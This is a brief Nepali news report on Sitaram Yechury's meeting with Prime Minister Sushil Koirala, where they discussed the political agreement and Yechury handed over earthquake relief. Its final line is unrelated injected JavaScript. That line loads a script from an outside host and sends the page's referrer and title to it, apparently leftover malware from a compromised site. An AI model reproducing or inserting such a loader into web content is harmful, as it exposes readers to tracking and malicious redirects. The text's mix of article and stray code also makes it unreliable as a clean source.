भारतीय कम्युनिष्ट पार्टी माक्सवादीका महासचिव सितारमा यचुरीले प्रधानमन्त्री सुशील कोइरालासँग भेट गर्नुभएको छ। बुधबार विहान यचुरीले वालुवाटारमा प्रधानमन्त्री कोइरालासँग भेट गर्नुभएको हो । भेटमा उहाँले चार राजनीतिक दलहरु बीच भएको सहमतिले लामो समयदेखीको संक्रमणकाल अन्त्य हुने आफु विस्वस्त रहेको जनाउनुभयो।

भेटमा प्रधानमन्त्री कोइरालाले दलहरु बीच सहमति जुटिसकेको भन्दै एक महिनामा राष्ट्रले निकास पाउने बताएको महासचिव यचुरीले जानकारी दिनुभयो। प्रधानमन्त्री सँगको भेटमा भारतीय जनताको तर्फबाट भूकम्प पीडितको सहयोगार्थ २५ लाख भारतीय रुपैयाको चेक हस्तान्तरण गर्नुभयो।

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;